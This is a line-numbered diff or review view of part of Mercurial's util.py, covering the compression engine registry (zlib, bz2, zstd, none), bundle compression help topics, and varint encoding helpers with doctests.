3377 3599 def forbundlename(self, bundlename):
3378 3600 """Obtain a compression engine registered to a bundle name.
3379 3601
3380 3602 Will raise KeyError if the bundle type isn't registered.
3381 3603
3382 3604 Will abort if the engine is known but not available.
3383 3605 """
3384 3606 engine = self._engines[self._bundlenames[bundlename]]
3385 3607 if not engine.available():
3386 3608 raise error.Abort(_('compression engine %s could not be loaded') %
3387 3609 engine.name())
3388 3610 return engine
3389 3611
3390 3612 def forbundletype(self, bundletype):
3391 3613 """Obtain a compression engine registered to a bundle type.
3392 3614
3393 3615 Will raise KeyError if the bundle type isn't registered.
3394 3616
3395 3617 Will abort if the engine is known but not available.
3396 3618 """
3397 3619 engine = self._engines[self._bundletypes[bundletype]]
3398 3620 if not engine.available():
3399 3621 raise error.Abort(_('compression engine %s could not be loaded') %
3400 3622 engine.name())
3401 3623 return engine
3402 3624
3403 3625 def supportedwireengines(self, role, onlyavailable=True):
3404 3626 """Obtain compression engines that support the wire protocol.
3405 3627
3406 3628 Returns a list of engines in prioritized order, most desired first.
3407 3629
3408 3630 If ``onlyavailable`` is set, filter out engines that can't be
3409 3631 loaded.
3410 3632 """
3411 3633 assert role in (SERVERROLE, CLIENTROLE)
3412 3634
3413 3635 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3414 3636
3415 3637 engines = [self._engines[e] for e in self._wiretypes.values()]
3416 3638 if onlyavailable:
3417 3639 engines = [e for e in engines if e.available()]
3418 3640
3419 3641 def getkey(e):
3420 3642 # Sort first by priority, highest first. In case of tie, sort
3421 3643 # alphabetically. This is arbitrary, but ensures output is
3422 3644 # stable.
3423 3645 w = e.wireprotosupport()
3424 3646 return -1 * getattr(w, attr), w.name
3425 3647
3426 3648 return list(sorted(engines, key=getkey))
3427 3649
3428 3650 def forwiretype(self, wiretype):
3429 3651 engine = self._engines[self._wiretypes[wiretype]]
3430 3652 if not engine.available():
3431 3653 raise error.Abort(_('compression engine %s could not be loaded') %
3432 3654 engine.name())
3433 3655 return engine
3434 3656
3435 3657 def forrevlogheader(self, header):
3436 3658 """Obtain a compression engine registered to a revlog header.
3437 3659
3438 3660 Will raise KeyError if the revlog header value isn't registered.
3439 3661 """
3440 3662 return self._engines[self._revlogheaders[header]]
3441 3663
3442 3664 compengines = compressormanager()
3443 3665
3444 3666 class compressionengine(object):
3445 3667 """Base class for compression engines.
3446 3668
3447 3669 Compression engines must implement the interface defined by this class.
3448 3670 """
3449 3671 def name(self):
3450 3672 """Returns the name of the compression engine.
3451 3673
3452 3674 This is the key the engine is registered under.
3453 3675
3454 3676 This method must be implemented.
3455 3677 """
3456 3678 raise NotImplementedError()
3457 3679
3458 3680 def available(self):
3459 3681 """Whether the compression engine is available.
3460 3682
3461 3683 The intent of this method is to allow optional compression engines
3462 3684 that may not be available in all installations (such as engines relying
3463 3685 on C extensions that may not be present).
3464 3686 """
3465 3687 return True
3466 3688
3467 3689 def bundletype(self):
3468 3690 """Describes bundle identifiers for this engine.
3469 3691
3470 3692 If this compression engine isn't supported for bundles, returns None.
3471 3693
3472 3694 If this engine can be used for bundles, returns a 2-tuple of strings of
3473 3695 the user-facing "bundle spec" compression name and an internal
3474 3696 identifier used to denote the compression format within bundles. To
3475 3697 exclude the name from external usage, set the first element to ``None``.
3476 3698
3477 3699 If bundle compression is supported, the class must also implement
3478 3700 ``compressstream`` and `decompressorreader``.
3479 3701
3480 3702 The docstring of this method is used in the help system to tell users
3481 3703 about this engine.
3482 3704 """
3483 3705 return None
3484 3706
3485 3707 def wireprotosupport(self):
3486 3708 """Declare support for this compression format on the wire protocol.
3487 3709
3488 3710 If this compression engine isn't supported for compressing wire
3489 3711 protocol payloads, returns None.
3490 3712
3491 3713 Otherwise, returns ``compenginewireprotosupport`` with the following
3492 3714 fields:
3493 3715
3494 3716 * String format identifier
3495 3717 * Integer priority for the server
3496 3718 * Integer priority for the client
3497 3719
3498 3720 The integer priorities are used to order the advertisement of format
3499 3721 support by server and client. The highest integer is advertised
3500 3722 first. Integers with non-positive values aren't advertised.
3501 3723
3502 3724 The priority values are somewhat arbitrary and only used for default
3503 3725 ordering. The relative order can be changed via config options.
3504 3726
3505 3727 If wire protocol compression is supported, the class must also implement
3506 3728 ``compressstream`` and ``decompressorreader``.
3507 3729 """
3508 3730 return None
3509 3731
3510 3732 def revlogheader(self):
3511 3733 """Header added to revlog chunks that identifies this engine.
3512 3734
3513 3735 If this engine can be used to compress revlogs, this method should
3514 3736 return the bytes used to identify chunks compressed with this engine.
3515 3737 Else, the method should return ``None`` to indicate it does not
3516 3738 participate in revlog compression.
3517 3739 """
3518 3740 return None
3519 3741
3520 3742 def compressstream(self, it, opts=None):
3521 3743 """Compress an iterator of chunks.
3522 3744
3523 3745 The method receives an iterator (ideally a generator) of chunks of
3524 3746 bytes to be compressed. It returns an iterator (ideally a generator)
3525 3747 of bytes of chunks representing the compressed output.
3526 3748
3527 3749 Optionally accepts an argument defining how to perform compression.
3528 3750 Each engine treats this argument differently.
3529 3751 """
3530 3752 raise NotImplementedError()
3531 3753
3532 3754 def decompressorreader(self, fh):
3533 3755 """Perform decompression on a file object.
3534 3756
3535 3757 Argument is an object with a ``read(size)`` method that returns
3536 3758 compressed data. Return value is an object with a ``read(size)`` that
3537 3759 returns uncompressed data.
3538 3760 """
3539 3761 raise NotImplementedError()
3540 3762
3541 3763 def revlogcompressor(self, opts=None):
3542 3764 """Obtain an object that can be used to compress revlog entries.
3543 3765
3544 3766 The object has a ``compress(data)`` method that compresses binary
3545 3767 data. This method returns compressed binary data or ``None`` if
3546 3768 the data could not be compressed (too small, not compressible, etc).
3547 3769 The returned data should have a header uniquely identifying this
3548 3770 compression format so decompression can be routed to this engine.
3549 3771 This header should be identified by the ``revlogheader()`` return
3550 3772 value.
3551 3773
3552 3774 The object has a ``decompress(data)`` method that decompresses
3553 3775 data. The method will only be called if ``data`` begins with
3554 3776 ``revlogheader()``. The method should return the raw, uncompressed
3555 3777 data or raise a ``RevlogError``.
3556 3778
3557 3779 The object is reusable but is not thread safe.
3558 3780 """
3559 3781 raise NotImplementedError()
3560 3782
3561 3783 class _zlibengine(compressionengine):
3562 3784 def name(self):
3563 3785 return 'zlib'
3564 3786
3565 3787 def bundletype(self):
3566 3788 """zlib compression using the DEFLATE algorithm.
3567 3789
3568 3790 All Mercurial clients should support this format. The compression
3569 3791 algorithm strikes a reasonable balance between compression ratio
3570 3792 and size.
3571 3793 """
3572 3794 return 'gzip', 'GZ'
3573 3795
3574 3796 def wireprotosupport(self):
3575 3797 return compewireprotosupport('zlib', 20, 20)
3576 3798
3577 3799 def revlogheader(self):
3578 3800 return 'x'
3579 3801
3580 3802 def compressstream(self, it, opts=None):
3581 3803 opts = opts or {}
3582 3804
3583 3805 z = zlib.compressobj(opts.get('level', -1))
3584 3806 for chunk in it:
3585 3807 data = z.compress(chunk)
3586 3808 # Not all calls to compress emit data. It is cheaper to inspect
3587 3809 # here than to feed empty chunks through generator.
3588 3810 if data:
3589 3811 yield data
3590 3812
3591 3813 yield z.flush()
3592 3814
3593 3815 def decompressorreader(self, fh):
3594 3816 def gen():
3595 3817 d = zlib.decompressobj()
3596 3818 for chunk in filechunkiter(fh):
3597 3819 while chunk:
3598 3820 # Limit output size to limit memory.
3599 3821 yield d.decompress(chunk, 2 ** 18)
3600 3822 chunk = d.unconsumed_tail
3601 3823
3602 3824 return chunkbuffer(gen())
3603 3825
3604 3826 class zlibrevlogcompressor(object):
3605 3827 def compress(self, data):
3606 3828 insize = len(data)
3607 3829 # Caller handles empty input case.
3608 3830 assert insize > 0
3609 3831
3610 3832 if insize < 44:
3611 3833 return None
3612 3834
3613 3835 elif insize <= 1000000:
3614 3836 compressed = zlib.compress(data)
3615 3837 if len(compressed) < insize:
3616 3838 return compressed
3617 3839 return None
3618 3840
3619 3841 # zlib makes an internal copy of the input buffer, doubling
3620 3842 # memory usage for large inputs. So do streaming compression
3621 3843 # on large inputs.
3622 3844 else:
3623 3845 z = zlib.compressobj()
3624 3846 parts = []
3625 3847 pos = 0
3626 3848 while pos < insize:
3627 3849 pos2 = pos + 2**20
3628 3850 parts.append(z.compress(data[pos:pos2]))
3629 3851 pos = pos2
3630 3852 parts.append(z.flush())
3631 3853
3632 3854 if sum(map(len, parts)) < insize:
3633 3855 return ''.join(parts)
3634 3856 return None
3635 3857
3636 3858 def decompress(self, data):
3637 3859 try:
3638 3860 return zlib.decompress(data)
3639 3861 except zlib.error as e:
3640 3862 raise error.RevlogError(_('revlog decompress error: %s') %
3641 3863 forcebytestr(e))
3642 3864
3643 3865 def revlogcompressor(self, opts=None):
3644 3866 return self.zlibrevlogcompressor()
3645 3867
3646 3868 compengines.register(_zlibengine())
3647 3869
3648 3870 class _bz2engine(compressionengine):
3649 3871 def name(self):
3650 3872 return 'bz2'
3651 3873
3652 3874 def bundletype(self):
3653 3875 """An algorithm that produces smaller bundles than ``gzip``.
3654 3876
3655 3877 All Mercurial clients should support this format.
3656 3878
3657 3879 This engine will likely produce smaller bundles than ``gzip`` but
3658 3880 will be significantly slower, both during compression and
3659 3881 decompression.
3660 3882
3661 3883 If available, the ``zstd`` engine can yield similar or better
3662 3884 compression at much higher speeds.
3663 3885 """
3664 3886 return 'bzip2', 'BZ'
3665 3887
3666 3888 # We declare a protocol name but don't advertise by default because
3667 3889 # it is slow.
3668 3890 def wireprotosupport(self):
3669 3891 return compewireprotosupport('bzip2', 0, 0)
3670 3892
3671 3893 def compressstream(self, it, opts=None):
3672 3894 opts = opts or {}
3673 3895 z = bz2.BZ2Compressor(opts.get('level', 9))
3674 3896 for chunk in it:
3675 3897 data = z.compress(chunk)
3676 3898 if data:
3677 3899 yield data
3678 3900
3679 3901 yield z.flush()
3680 3902
3681 3903 def decompressorreader(self, fh):
3682 3904 def gen():
3683 3905 d = bz2.BZ2Decompressor()
3684 3906 for chunk in filechunkiter(fh):
3685 3907 yield d.decompress(chunk)
3686 3908
3687 3909 return chunkbuffer(gen())
3688 3910
3689 3911 compengines.register(_bz2engine())
3690 3912
3691 3913 class _truncatedbz2engine(compressionengine):
3692 3914 def name(self):
3693 3915 return 'bz2truncated'
3694 3916
3695 3917 def bundletype(self):
3696 3918 return None, '_truncatedBZ'
3697 3919
3698 3920 # We don't implement compressstream because it is hackily handled elsewhere.
3699 3921
3700 3922 def decompressorreader(self, fh):
3701 3923 def gen():
3702 3924 # The input stream doesn't have the 'BZ' header. So add it back.
3703 3925 d = bz2.BZ2Decompressor()
3704 3926 d.decompress('BZ')
3705 3927 for chunk in filechunkiter(fh):
3706 3928 yield d.decompress(chunk)
3707 3929
3708 3930 return chunkbuffer(gen())
3709 3931
3710 3932 compengines.register(_truncatedbz2engine())
3711 3933
3712 3934 class _noopengine(compressionengine):
3713 3935 def name(self):
3714 3936 return 'none'
3715 3937
3716 3938 def bundletype(self):
3717 3939 """No compression is performed.
3718 3940
3719 3941 Use this compression engine to explicitly disable compression.
3720 3942 """
3721 3943 return 'none', 'UN'
3722 3944
3723 3945 # Clients always support uncompressed payloads. Servers don't because
3724 3946 # unless you are on a fast network, uncompressed payloads can easily
3725 3947 # saturate your network pipe.
3726 3948 def wireprotosupport(self):
3727 3949 return compewireprotosupport('none', 0, 10)
3728 3950
3729 3951 # We don't implement revlogheader because it is handled specially
3730 3952 # in the revlog class.
3731 3953
3732 3954 def compressstream(self, it, opts=None):
3733 3955 return it
3734 3956
3735 3957 def decompressorreader(self, fh):
3736 3958 return fh
3737 3959
3738 3960 class nooprevlogcompressor(object):
3739 3961 def compress(self, data):
3740 3962 return None
3741 3963
3742 3964 def revlogcompressor(self, opts=None):
3743 3965 return self.nooprevlogcompressor()
3744 3966
3745 3967 compengines.register(_noopengine())
3746 3968
3747 3969 class _zstdengine(compressionengine):
3748 3970 def name(self):
3749 3971 return 'zstd'
3750 3972
3751 3973 @propertycache
3752 3974 def _module(self):
3753 3975 # Not all installs have the zstd module available. So defer importing
3754 3976 # until first access.
3755 3977 try:
3756 3978 from . import zstd
3757 3979 # Force delayed import.
3758 3980 zstd.__version__
3759 3981 return zstd
3760 3982 except ImportError:
3761 3983 return None
3762 3984
3763 3985 def available(self):
3764 3986 return bool(self._module)
3765 3987
3766 3988 def bundletype(self):
3767 3989 """A modern compression algorithm that is fast and highly flexible.
3768 3990
3769 3991 Only supported by Mercurial 4.1 and newer clients.
3770 3992
3771 3993 With the default settings, zstd compression is both faster and yields
3772 3994 better compression than ``gzip``. It also frequently yields better
3773 3995 compression than ``bzip2`` while operating at much higher speeds.
3774 3996
3775 3997 If this engine is available and backwards compatibility is not a
3776 3998 concern, it is likely the best available engine.
3777 3999 """
3778 4000 return 'zstd', 'ZS'
3779 4001
3780 4002 def wireprotosupport(self):
3781 4003 return compewireprotosupport('zstd', 50, 50)
3782 4004
3783 4005 def revlogheader(self):
3784 4006 return '\x28'
3785 4007
3786 4008 def compressstream(self, it, opts=None):
3787 4009 opts = opts or {}
3788 4010 # zstd level 3 is almost always significantly faster than zlib
3789 4011 # while providing no worse compression. It strikes a good balance
3790 4012 # between speed and compression.
3791 4013 level = opts.get('level', 3)
3792 4014
3793 4015 zstd = self._module
3794 4016 z = zstd.ZstdCompressor(level=level).compressobj()
3795 4017 for chunk in it:
3796 4018 data = z.compress(chunk)
3797 4019 if data:
3798 4020 yield data
3799 4021
3800 4022 yield z.flush()
3801 4023
3802 4024 def decompressorreader(self, fh):
3803 4025 zstd = self._module
3804 4026 dctx = zstd.ZstdDecompressor()
3805 4027 return chunkbuffer(dctx.read_from(fh))
3806 4028
3807 4029 class zstdrevlogcompressor(object):
3808 4030 def __init__(self, zstd, level=3):
3809 4031 # Writing the content size adds a few bytes to the output. However,
3810 4032 # it allows decompression to be more optimal since we can
3811 4033 # pre-allocate a buffer to hold the result.
3812 4034 self._cctx = zstd.ZstdCompressor(level=level,
3813 4035 write_content_size=True)
3814 4036 self._dctx = zstd.ZstdDecompressor()
3815 4037 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3816 4038 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3817 4039
3818 4040 def compress(self, data):
3819 4041 insize = len(data)
3820 4042 # Caller handles empty input case.
3821 4043 assert insize > 0
3822 4044
3823 4045 if insize < 50:
3824 4046 return None
3825 4047
3826 4048 elif insize <= 1000000:
3827 4049 compressed = self._cctx.compress(data)
3828 4050 if len(compressed) < insize:
3829 4051 return compressed
3830 4052 return None
3831 4053 else:
3832 4054 z = self._cctx.compressobj()
3833 4055 chunks = []
3834 4056 pos = 0
3835 4057 while pos < insize:
3836 4058 pos2 = pos + self._compinsize
3837 4059 chunk = z.compress(data[pos:pos2])
3838 4060 if chunk:
3839 4061 chunks.append(chunk)
3840 4062 pos = pos2
3841 4063 chunks.append(z.flush())
3842 4064
3843 4065 if sum(map(len, chunks)) < insize:
3844 4066 return ''.join(chunks)
3845 4067 return None
3846 4068
3847 4069 def decompress(self, data):
3848 4070 insize = len(data)
3849 4071
3850 4072 try:
3851 4073 # This was measured to be faster than other streaming
3852 4074 # decompressors.
3853 4075 dobj = self._dctx.decompressobj()
3854 4076 chunks = []
3855 4077 pos = 0
3856 4078 while pos < insize:
3857 4079 pos2 = pos + self._decompinsize
3858 4080 chunk = dobj.decompress(data[pos:pos2])
3859 4081 if chunk:
3860 4082 chunks.append(chunk)
3861 4083 pos = pos2
3862 4084 # Frame should be exhausted, so no finish() API.
3863 4085
3864 4086 return ''.join(chunks)
3865 4087 except Exception as e:
3866 4088 raise error.RevlogError(_('revlog decompress error: %s') %
3867 4089 forcebytestr(e))
3868 4090
3869 4091 def revlogcompressor(self, opts=None):
3870 4092 opts = opts or {}
3871 4093 return self.zstdrevlogcompressor(self._module,
3872 4094 level=opts.get('level', 3))
3873 4095
3874 4096 compengines.register(_zstdengine())
3875 4097
3876 4098 def bundlecompressiontopics():
3877 4099 """Obtains a list of available bundle compressions for use in help."""
3878 4100 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3879 4101 items = {}
3880 4102
3881 4103 # We need to format the docstring. So use a dummy object/type to hold it
3882 4104 # rather than mutating the original.
3883 4105 class docobject(object):
3884 4106 pass
3885 4107
3886 4108 for name in compengines:
3887 4109 engine = compengines[name]
3888 4110
3889 4111 if not engine.available():
3890 4112 continue
3891 4113
3892 4114 bt = engine.bundletype()
3893 4115 if not bt or not bt[0]:
3894 4116 continue
3895 4117
3896 4118 doc = pycompat.sysstr('``%s``\n %s') % (
3897 4119 bt[0], engine.bundletype.__doc__)
3898 4120
3899 4121 value = docobject()
3900 4122 value.__doc__ = doc
3901 4123 value._origdoc = engine.bundletype.__doc__
3902 4124 value._origfunc = engine.bundletype
3903 4125
3904 4126 items[bt[0]] = value
3905 4127
3906 4128 return items
3907 4129
3908 4130 i18nfunctions = bundlecompressiontopics().values()
3909 4131
3910 4132 # convenient shortcut
3911 4133 dst = debugstacktrace
3912 4134
3913 4135 def safename(f, tag, ctx, others=None):
3914 4136 """
3915 4137 Generate a name that it is safe to rename f to in the given context.
3916 4138
3917 4139 f: filename to rename
3918 4140 tag: a string tag that will be included in the new name
3919 4141 ctx: a context, in which the new name must not exist
3920 4142 others: a set of other filenames that the new name must not be in
3921 4143
3922 4144 Returns a file name of the form oldname~tag[~number] which does not exist
3923 4145 in the provided context and is not in the set of other names.
3924 4146 """
3925 4147 if others is None:
3926 4148 others = set()
3927 4149
3928 4150 fn = '%s~%s' % (f, tag)
3929 4151 if fn not in ctx and fn not in others:
3930 4152 return fn
3931 4153 for n in itertools.count(1):
3932 4154 fn = '%s~%s~%s' % (f, tag, n)
3933 4155 if fn not in ctx and fn not in others:
3934 4156 return fn
3935 4157
3936 4158 def readexactly(stream, n):
3937 4159 '''read n bytes from stream.read and abort if less was available'''
3938 4160 s = stream.read(n)
3939 4161 if len(s) < n:
3940 4162 raise error.Abort(_("stream ended unexpectedly"
3941 4163 " (got %d bytes, expected %d)")
3942 4164 % (len(s), n))
3943 4165 return s
3944 4166
3945 4167 def uvarintencode(value):
3946 4168 """Encode an unsigned integer value to a varint.
3947 4169
3948 4170 A varint is a variable length integer of 1 or more bytes. Each byte
3949 4171 except the last has the most significant bit set. The lower 7 bits of
3950 4172 each byte store the 2's complement representation, least significant group
3951 4173 first.
3952 4174
3953 4175 >>> uvarintencode(0)
3954 4176 '\\x00'
3955 4177 >>> uvarintencode(1)
3956 4178 '\\x01'
3957 4179 >>> uvarintencode(127)
3958 4180 '\\x7f'
3959 4181 >>> uvarintencode(1337)
3960 4182 '\\xb9\\n'
3961 4183 >>> uvarintencode(65536)
3962 4184 '\\x80\\x80\\x04'
3963 4185 >>> uvarintencode(-1)
3964 4186 Traceback (most recent call last):
3965 4187 ...
3966 4188 ProgrammingError: negative value for uvarint: -1
3967 4189 """
3968 4190 if value < 0:
3969 4191 raise error.ProgrammingError('negative value for uvarint: %d'
3970 4192 % value)
3971 4193 bits = value & 0x7f
3972 4194 value >>= 7
3973 4195 bytes = []
3974 4196 while value:
3975 4197 bytes.append(pycompat.bytechr(0x80 | bits))
3976 4198 bits = value & 0x7f
3977 4199 value >>= 7
3978 4200 bytes.append(pycompat.bytechr(bits))
3979 4201
3980 4202 return ''.join(bytes)
3981 4203
3982 4204 def uvarintdecodestream(fh):
3983 4205 """Decode an unsigned variable length integer from a stream.
3984 4206
3985 4207 The passed argument is anything that has a ``.read(N)`` method.
3986 4208
3987 4209 >>> try:
3988 4210 ... from StringIO import StringIO as BytesIO
3989 4211 ... except ImportError:
3990 4212 ... from io import BytesIO
3991 4213 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3992 4214 0
3993 4215 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3994 4216 1
3995 4217 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3996 4218 127
3997 4219 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3998 4220 1337
3999 4221 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4000 4222 65536
4001 4223 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4002 4224 Traceback (most recent call last):
4003 4225 ...
4004 4226 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4005 4227 """
4006 4228 result = 0
4007 4229 shift = 0
4008 4230 while True:
4009 4231 byte = ord(readexactly(fh, 1))
4010 4232 result |= ((byte & 0x7f) << shift)
4011 4233 if not (byte & 0x80):
4012 4234 return result
4013 4235 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now